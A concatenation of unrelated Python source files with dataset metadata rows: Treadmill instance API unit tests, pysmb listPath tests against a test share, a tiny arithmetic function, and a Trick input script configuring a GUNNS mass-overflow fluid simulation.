self.instance.create('proid.app', {}, count=0)
with six.assertRaisesRegex(self,
jsonschema.exceptions.ValidationError,
'1001 is greater than the maximum of 1000'):
self.instance.create('proid.app', {}, count=1001)
@mock.patch('treadmill.context.AdminContext.conn',
mock.Mock(return_value=admin.Admin(None, None)))
@mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.delete_apps')
def test_instance_bulk_delete(self, delete_apps_mock):
"""Test bulk deleting
"""
delete_apps_mock.return_value = None
self.instance.bulk_delete(
'proid',
['proid.app#0000000001', 'proid.app#0000000002']
)
delete_apps_mock.assert_called_once_with(
mock.ANY, ['proid.app#0000000001', 'proid.app#0000000002'], None
)
@mock.patch('treadmill.context.AdminContext.conn',
mock.Mock(return_value=admin.Admin(None, None)))
@mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.update_app_priorities')
def test_instance_bulk_update(self, update_apps_mock):
"""Test bulk updateing
"""
update_apps_mock.return_value = None
self.instance.bulk_update(
'proid',
[{'_id': 'proid.app#0000000001', 'priority': 1}]
)
update_apps_mock.assert_called_with(
mock.ANY, {'proid.app#0000000001': 1}
)
@mock.patch('treadmill.context.AdminContext.conn',
mock.Mock(return_value=admin.Admin(None, None)))
@mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.create_apps', mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats')
@mock.patch('treadmill.api.instance._check_required_attributes',
mock.Mock())
def test_quotas(self, scheduled_stats_mock):
"""Test quotas enforcement.
"""
doc = """
services:
- command: /bin/sleep 10
name: sleep1m
restart:
limit: 0
memory: 100M
cpu: 10%
disk: 100M
"""
scheduled_stats_mock.return_value = {'xxx': 50000}
with self.assertRaises(exc.QuotaExceededError):
self.instance.create('yyy.app', yaml.load(doc), count=1)
scheduled_stats_mock.return_value = {'xxx': 49900}
with self.assertRaises(exc.QuotaExceededError):
self.instance.create('yyy.app', yaml.load(doc), count=101)
scheduled_stats_mock.return_value = {'yyy': 10000}
with self.assertRaises(exc.QuotaExceededError):
self.instance.create('yyy.app', yaml.load(doc), count=1)
scheduled_stats_mock.return_value = {'yyy': 9900}
with self.assertRaises(exc.QuotaExceededError):
self.instance.create('yyy.app', yaml.load(doc), count=101)
@mock.patch('treadmill.context.AdminContext.conn',
mock.Mock(return_value=admin.Admin(None, None)))
@mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.create_apps')
@mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats',
mock.Mock(return_value={}))
@mock.patch('treadmill.api.instance._check_required_attributes',
mock.Mock())
def test_debug_services(self, create_apps_mock):
"""Test debugging services.
"""
doc = """
services:
- command: /bin/sleep 10
name: sleep1
restart:
limit: 0
- command: /bin/sleep 10
name: sleep2
restart:
limit: 0
- command: /bin/sleep 10
name: sleep3
restart:
limit: 0
memory: 100M
cpu: 10%
disk: 100M
"""
# Don't debug services (no debug/debug_services).
self.instance.create('proid.app', yaml.load(doc))
create_apps_mock.assert_called_once()
args, _kwargs = create_apps_mock.call_args
_zkclient, _app_id, app, _count, _created_by = args
self.assertEqual(
[svc['name'] for svc in app['services'] if svc.get('downed')],
[]
)
create_apps_mock.reset_mock()
# Debug all services (debug without debug_services).
self.instance.create('proid.app', yaml.load(doc), debug=True)
create_apps_mock.assert_called_once()
args, _kwargs = create_apps_mock.call_args
_zkclient, _app_id, app, _count, _created_by = args
self.assertEqual(
[svc['name'] for svc in app['services'] if svc.get('downed')],
['sleep1', 'sleep2', 'sleep3']
)
create_apps_mock.reset_mock()
# Debug selected services (debug_services with a list of services).
self.instance.create(
'proid.app', yaml.load(doc), debug_services=['sleep1', 'sleep2']
)
create_apps_mock.assert_called_once()
args, _kwargs = create_apps_mock.call_args
_zkclient, _app_id, app, _count, _created_by = args
self.assertEqual(
[svc['name'] for svc in app['services'] if svc.get('downed')],
['sleep1', 'sleep2']
)
if __name__ == '__main__':
unittest.main()
| 37.419214 | 79 | 0.570487 | 1,771 | 17,138 | 5.326934 | 0.115754 | 0.05088 | 0.091584 | 0.053 | 0.848421 | 0.841743 | 0.805385 | 0.785881 | 0.757579 | 0.737333 | 0 | 0.02939 | 0.29916 | 17,138 | 457 | 80 | 37.501094 | 0.756057 | 0.04032 | 0 | 0.734417 | 0 | 0 | 0.278249 | 0.115805 | 0 | 0 | 0 | 0 | 0.092141 | 1 | 0.03252 | false | 0.00813 | 0.03523 | 0.00271 | 0.073171 | 0.00271 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
46870bba7c6a8650f3a2ea5c0c8601f744082c29 | 7,835 | py | Python | python3/tests/SMBConnectionTests/test_listpath.py | frafra/pysmb | 0b0b9a7601f8beb583c44799bc88e1a64c3440f3 | [
"Zlib"
] | 280 | 2015-01-21T14:34:41.000Z | 2022-03-02T03:36:05.000Z | python3/tests/SMBConnectionTests/test_listpath.py | frafra/pysmb | 0b0b9a7601f8beb583c44799bc88e1a64c3440f3 | [
"Zlib"
] | 160 | 2015-01-09T22:05:44.000Z | 2022-03-29T11:34:44.000Z | python3/tests/SMBConnectionTests/test_listpath.py | frafra/pysmb | 0b0b9a7601f8beb583c44799bc88e1a64c3440f3 | [
"Zlib"
] | 101 | 2015-01-17T21:12:22.000Z | 2022-01-26T11:12:16.000Z | # -*- coding: utf-8 -*-
from nose2.tools.decorators import with_setup, with_teardown
from smb.SMBConnection import SMBConnection
from smb.smb_constants import *
from smb import smb_structs
from .util import getConnectionInfo
conn = None
def setup_func_SMB1():
global conn
smb_structs.SUPPORT_SMB2 = False
info = getConnectionInfo()
conn = SMBConnection(info['user'], info['password'], info['client_name'], info['server_name'], use_ntlm_v2 = True)
assert conn.connect(info['server_ip'], info['server_port'])
def setup_func_SMB2():
global conn
smb_structs.SUPPORT_SMB2 = True
info = getConnectionInfo()
conn = SMBConnection(info['user'], info['password'], info['client_name'], info['server_name'], use_ntlm_v2 = True)
assert conn.connect(info['server_ip'], info['server_port'])
def teardown_func():
global conn
conn.close()
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPath_SMB1():
global conn
results = conn.listPath('smbtest', '/')
filenames = [( r.filename, r.isDirectory ) for r in results]
assert ( '\u6d4b\u8bd5\u6587\u4ef6\u5939', True ) in filenames # Test non-English folder names
assert ( 'Test Folder with Long Name', True ) in filenames # Test long English folder names
assert ( 'TestDir1', True ) in filenames # Test short English folder names
assert ( 'Implementing CIFS - SMB.html', False ) in filenames # Test long English file names
assert ( 'rfc1001.txt', False ) in filenames # Test short English file names
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listSubPath_SMB1():
global conn
results = conn.listPath('smbtest', '/Test Folder with Long Name/')
filenames = [( r.filename, r.isDirectory ) for r in results]
assert ( 'Test File.txt', False ) in filenames
assert ( 'Test Folder', True ) in filenames
assert ( '子文件夹', True ) in filenames
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPathWithManyFiles_SMB1():
global conn
results = conn.listPath('smbtest', '/RFC Archive/')
filenames = map(lambda r: ( r.filename, r.isDirectory ), results)
assert len(list(filenames))==999
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPath_SMB2():
global conn
results = conn.listPath('smbtest', '/')
filenames = [( r.filename, r.isDirectory ) for r in results]
assert ( '\u6d4b\u8bd5\u6587\u4ef6\u5939', True ) in filenames # Test non-English folder names
assert ( 'Test Folder with Long Name', True ) in filenames # Test long English folder names
assert ( 'TestDir1', True ) in filenames # Test short English folder names
assert ( 'Implementing CIFS - SMB.html', False ) in filenames # Test long English file names
assert ( 'rfc1001.txt', False ) in filenames # Test short English file names
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listSubPath_SMB2():
global conn
results = conn.listPath('smbtest', '/Test Folder with Long Name/')
filenames = [( r.filename, r.isDirectory ) for r in results]
assert ( 'Test File.txt', False ) in filenames
assert ( 'Test Folder', True ) in filenames
assert ( '子文件夹', True ) in filenames
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPathWithManyFiles_SMB2():
global conn
results = conn.listPath('smbtest', '/RFC Archive/')
filenames = map(lambda r: ( r.filename, r.isDirectory ), results)
assert len(list(filenames))==999
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPathFilterForDirectory_SMB1():
global conn
results = conn.listPath('smbtest', '/Test Folder with Long Name', search = SMB_FILE_ATTRIBUTE_DIRECTORY)
filenames = map(lambda r: ( r.filename, r.isDirectory ), results)
assert len(list(filenames)) > 0
for f, isDirectory in filenames:
assert isDirectory
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPathFilterForDirectory_SMB2():
global conn
results = conn.listPath('smbtest', '/Test Folder with Long Name', search = SMB_FILE_ATTRIBUTE_DIRECTORY)
filenames = map(lambda r: ( r.filename, r.isDirectory ), results)
assert len(list(filenames)) > 0
for f, isDirectory in filenames:
assert isDirectory
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPathFilterForFiles_SMB1():
global conn
results = conn.listPath('smbtest', '/Test Folder with Long Name', search = SMB_FILE_ATTRIBUTE_READONLY | SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM | SMB_FILE_ATTRIBUTE_ARCHIVE | SMB_FILE_ATTRIBUTE_INCL_NORMAL)
filenames = map(lambda r: ( r.filename, r.isDirectory ), results)
assert len(list(filenames)) > 0
for f, isDirectory in filenames:
assert not isDirectory
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPathFilterForFiles_SMB2():
global conn
results = conn.listPath('smbtest', '/Test Folder with Long Name', search = SMB_FILE_ATTRIBUTE_READONLY | SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM | SMB_FILE_ATTRIBUTE_ARCHIVE | SMB_FILE_ATTRIBUTE_INCL_NORMAL)
filenames = map(lambda r: ( r.filename, r.isDirectory ), results)
assert len(list(filenames)) > 0
for f, isDirectory in filenames:
assert not isDirectory
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPathFilterPattern_SMB1():
global conn
results = conn.listPath('smbtest', '/Test Folder with Long Name', pattern = 'Test*')
filenames = list(map(lambda r: ( r.filename, r.isDirectory ), results))
assert len(filenames) == 2
assert ( u'Test File.txt', False ) in filenames
assert ( u'Test Folder', True ) in filenames
assert ( u'子文件夹', True ) not in filenames
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPathFilterPattern_SMB2():
global conn
results = conn.listPath('smbtest', '/Test Folder with Long Name', pattern = 'Test*')
filenames = list(map(lambda r: ( r.filename, r.isDirectory ), results))
assert len(filenames) == 2
assert ( u'Test File.txt', False ) in filenames
assert ( u'Test Folder', True ) in filenames
assert ( u'子文件夹', True ) not in filenames
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPathFilterUnicodePattern_SMB1():
global conn
results = conn.listPath('smbtest', '/Test Folder with Long Name', pattern = u'*件夹')
filenames = list(map(lambda r: ( r.filename, r.isDirectory ), results))
assert len(filenames) == 1
assert ( u'Test File.txt', False ) not in filenames
assert ( u'Test Folder', True ) not in filenames
assert ( u'子文件夹', True ) in filenames
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPathFilterUnicodePattern_SMB2():
global conn
results = conn.listPath('smbtest', '/Test Folder with Long Name', pattern = u'*件夹')
filenames = list(map(lambda r: ( r.filename, r.isDirectory ), results))
assert len(filenames) == 1
assert ( u'Test File.txt', False ) not in filenames
assert ( u'Test Folder', True ) not in filenames
assert ( u'子文件夹', True ) in filenames
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPathFilterEmptyList_SMB1():
global conn
results = conn.listPath('smbtest', '/RFC Archive', pattern = '*.abc')
filenames = list(map(lambda r: ( r.filename, r.isDirectory ), results))
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPathFilterEmptyList_SMB2():
global conn
results = conn.listPath('smbtest', '/RFC Archive', pattern = '*.abc')
filenames = list(map(lambda r: ( r.filename, r.isDirectory ), results))
| 42.123656 | 225 | 0.712827 | 1,022 | 7,835 | 5.293542 | 0.098826 | 0.065065 | 0.041405 | 0.053235 | 0.95268 | 0.95268 | 0.94122 | 0.880592 | 0.880592 | 0.877634 | 0 | 0.014272 | 0.177281 | 7,835 | 185 | 226 | 42.351351 | 0.825008 | 0.041481 | 0 | 0.828221 | 0 | 0 | 0.1259 | 0.008002 | 0 | 0 | 0 | 0 | 0.269939 | 1 | 0.116564 | false | 0.01227 | 0.030675 | 0 | 0.147239 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
46a0c8277d9dff585c94fb4fc22cf64c6a9fbbc0 | 90 | py | Python | Python/Tutorial - 3/parameters.py | JC2295/FCC_Tutorial_Projects | 990e1221b2177acb9e4db0264adab518620404a0 | [
"MIT"
] | null | null | null | Python/Tutorial - 3/parameters.py | JC2295/FCC_Tutorial_Projects | 990e1221b2177acb9e4db0264adab518620404a0 | [
"MIT"
] | null | null | null | Python/Tutorial - 3/parameters.py | JC2295/FCC_Tutorial_Projects | 990e1221b2177acb9e4db0264adab518620404a0 | [
"MIT"
] | null | null | null | def par(x , y, z, i = 2, j = 4):
return x + y + z + i * j
print(par(1, 1, 1, 5, 5))
| 15 | 32 | 0.411111 | 22 | 90 | 1.681818 | 0.590909 | 0.108108 | 0.162162 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12069 | 0.355556 | 90 | 5 | 33 | 18 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0.333333 | 1 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d3b69cfb581836c09a06e150c02af111b65ba686 | 28,433 | py | Python | sims/SIM_mass_overflow/RUN_test/input.py | nasa/gunns | 248323939a476abe5178538cd7a3512b5f42675c | [
"NASA-1.3"
] | 18 | 2020-01-23T12:14:09.000Z | 2022-02-27T22:11:35.000Z | sims/SIM_mass_overflow/RUN_test/input.py | nasa/gunns | 248323939a476abe5178538cd7a3512b5f42675c | [
"NASA-1.3"
] | 39 | 2020-11-20T12:19:35.000Z | 2022-02-22T18:45:55.000Z | sims/SIM_mass_overflow/RUN_test/input.py | nasa/gunns | 248323939a476abe5178538cd7a3512b5f42675c | [
"NASA-1.3"
] | 7 | 2020-02-10T19:25:43.000Z | 2022-03-16T01:10:00.000Z | # @copyright Copyright 2019 United States Government as represented by the Administrator of the
# National Aeronautics and Space Administration. All Rights Reserved. */
#
#trick setup
trick.sim_services.exec_set_trap_sigfpe(1)
#simControlPanel = trick.SimControlPanel()
#trick.add_external_application(simControlPanel)
#trickView = trick.TrickView()
#trick.add_external_application(trickView)
#trick.real_time_enable()
trick.sim_services.exec_set_terminate_time(12)
trick.exec_set_software_frame(0.0125)
trick.TMM_reduced_checkpoint(False)
trick_mm.mm.set_expanded_arrays(True)
trick_sys.sched.set_enable_freeze(True)
#trick_sys.sched.set_freeze_command(True)
#---------------------------------------------
# Initial setup
#---------------------------------------------
# Override fluid14err volumes and pressures to be small to create a loop where all nodes are
# overflowing. Circulation is created by turning off the potential sources of all but the pot01
# link.
massOverflow.fluid14err.netInput.vol0.mInitialVolume = 1.0e-4
massOverflow.fluid14err.netInput.vol1.mInitialVolume = 1.0e-4
massOverflow.fluid14err.netInput.vol2.mInitialVolume = 1.0e-4
massOverflow.fluid14err.netInput.vol3.mInitialVolume = 1.0e-4
massOverflow.fluid14err.netInput.fluid0.mPressure = 100.0
massOverflow.fluid14err.netInput.fluid1.mPressure = 100.0
massOverflow.fluid14err.netInput.fluid2.mPressure = 100.0
massOverflow.fluid14err.netInput.fluid3.mPressure = 100.0
massOverflow.fluid14err.netInput.fluid0.mTemperature = 294.261
massOverflow.fluid14err.netInput.fluid1.mTemperature = 294.261
massOverflow.fluid14err.netInput.fluid2.mTemperature = 294.261
massOverflow.fluid14err.netInput.fluid3.mTemperature = 294.261
massOverflow.fluid14err.netInput.pot02.mSourcePressure = 0.0
massOverflow.fluid14err.netInput.pot13.mSourcePressure = 0.0
massOverflow.fluid14err.netInput.pot23.mSourcePressure = 0.0
massOverflow.fluid14err.netConfig.pot01.mMaxConductivity = 0.001
massOverflow.fluid14err.netConfig.pot02.mMaxConductivity = 0.001
massOverflow.fluid14err.netConfig.pot13.mMaxConductivity = 0.001
massOverflow.fluid14err.netConfig.pot23.mMaxConductivity = 0.001
massOverflow.fluid12err.netInput.vol0.mInitialVolume = 1.0
massOverflow.fluid12err.netInput.vol1.mInitialVolume = 1.0e-6
massOverflow.fluid12err.netInput.vol2.mInitialVolume = 1.0e-4
massOverflow.fluid12err.netInput.fluid0.mPressure = 100.0
massOverflow.fluid12err.netInput.fluid1.mPressure = 100.0
massOverflow.fluid12err.netInput.fluid2.mPressure = 100.0
massOverflow.fluid12err.netInput.fluid0.mTemperature = 275.0
massOverflow.fluid12err.netInput.fluid1.mTemperature = 275.0
massOverflow.fluid12err.netInput.fluid2.mTemperature = 275.0
massOverflow.fluid35.netConfig.msorb13des.addCompound(trick.ChemicalCompound.CO2,0.1,0.85,0.0,0.05,0.01,-1.0,True,trick.ChemicalCompound.NO_COMPOUND,True,0.0,0.1,1.0)
massOverflow.fluid35.netConfig.msorb13ad.addCompound(trick.ChemicalCompound.H2O,0.11,0.75,0.0,0.05,0.01,-1.0,True,trick.ChemicalCompound.NO_COMPOUND,False,1.0,0.0,1.0)
massOverflow.fluid48.netConfig.msorb45de.addCompound(trick.ChemicalCompound.CO2,0.1,0.85,0.0,0.05,0.01,-1.0,True,trick.ChemicalCompound.NO_COMPOUND,True,0.0,0.1,1.0)
massOverflow.fluid48.netConfig.msorb12ad.addCompound(trick.ChemicalCompound.H2O,0.11,0.75,0.0,0.05,0.01,-1.0,True,trick.ChemicalCompound.NO_COMPOUND,False,1.0,0.0,1.0)
massOverflow.fluid37.sub14.setHeatBalance(-10000.0)
# Configure sorbant segments in the GunnsFluidCdraAdsorber links
massOverflow.fluid41.cdra13.addSegment(0, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(1, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(2, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(3, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(4, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(5, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(6, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(7, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(8, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(9, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(0, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(1, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(2, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(3, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(4, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(5, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(6, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(7, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(8, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(9, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
# Override fluid45over node 1 volume to be small so it will overflow.
massOverflow.fluid45over.netInput.vol1.mInitialVolume = 1.0e-4
#---------------------------------------------
# T-0 setup (block all flows)
#---------------------------------------------
massOverflow.fluid.netInput.cond01.mMalfBlockageFlag = True
massOverflow.fluid.netInput.cond13.mMalfBlockageFlag = True
massOverflow.fluid.netInput.cond02.mMalfBlockageFlag = True
massOverflow.fluid.netInput.cond23.mMalfBlockageFlag = True
massOverflow.fluid37.netInput.sub14.mMalfBlockageFlag = True
massOverflow.fluid37.netInput.sub14.mMalfBlockageValue = 1.0
trick.add_read(0.0, """massOverflow.fluid6.vlv1.mPathA.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv1.mPathA.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv1.mPathB.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv1.mPathB.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv2.mPathA.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv2.mPathA.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv2.mPathB.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv2.mPathB.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv3.mPathA.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv3.mPathA.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv3.mPathB.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv3.mPathB.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv1.mPathA.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv1.mPathA.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv1.mPathB.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv1.mPathB.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv2.mPathA.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv2.mPathA.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv2.mPathB.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv2.mPathB.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid8.chk01.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid8.chk01.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid8.chk02.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid8.chk02.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid8.htch13.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid8.htch13.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid8.htch23.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid8.htch23.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid9.hxc01.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid9.hxc01.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid9.hxc02.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid9.hxc02.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid9.hxs13.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid9.hxs13.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid9.hxs23.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid9.hxs23.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid33.liqMembrane.mMalfMembraneDegradeFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid33.liqMembrane.mMalfMembraneDegradeValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid33.gasMembrane.mMalfMembraneDegradeFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid33.gasMembrane.mMalfMembraneDegradeValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid33.liqSource.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid33.liqSource.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid33.gasSource.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid33.gasSource.mMalfBlockageValue = 1.0""" )
#---------------------------------------------
# T+1 events (start all flows)
#---------------------------------------------
trick.add_read(1.0, """massOverflow.fluid.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid.cond13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid.cond02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid2.source13.setFlowDemand(0.1)""" )
trick.add_read(1.0, """massOverflow.fluid3.vlv01.setPosition(1.0)""" )
trick.add_read(1.0, """massOverflow.fluid3.vlv02.setPosition(1.0)""" )
trick.add_read(1.0, """massOverflow.fluid3.pipe13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid3.pipe23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid4.hx01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid4.hx02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid4.sensor13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid4.sensor23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid5.qd01.setState(trick.GunnsFluidSimpleQd.CONNECTED)""" )
trick.add_read(1.0, """massOverflow.fluid5.qd02.setState(trick.GunnsFluidSimpleQd.CONNECTED)""" )
trick.add_read(1.0, """massOverflow.fluid5.leak13.setMalfLeakHole(True, 1.0)""" )
trick.add_read(1.0, """massOverflow.fluid5.leak23.setMalfLeakHole(True, 1.0)""" )
trick.add_read(1.0, """massOverflow.fluid6.vlv1.mPathA.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid6.vlv1.mPathB.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid6.vlv2.mPathA.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid6.vlv2.mPathB.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid6.vlv3.mPathA.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid6.vlv3.mPathB.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid7.vlv1.mPathA.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid7.vlv1.mPathB.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid7.vlv2.mPathA.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid7.vlv2.mPathB.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid8.chk01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid8.chk02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid8.chk01.setMalfFailTo(True,1.0)""" )
#trick.add_read(1.0, """massOverflow.fluid8.htch13.mMalfBlockageFlag = False""" )
#trick.add_read(1.0, """massOverflow.fluid8.htch23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid9.hxc01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid9.hxc02.mMalfBlockageFlag = False""" )
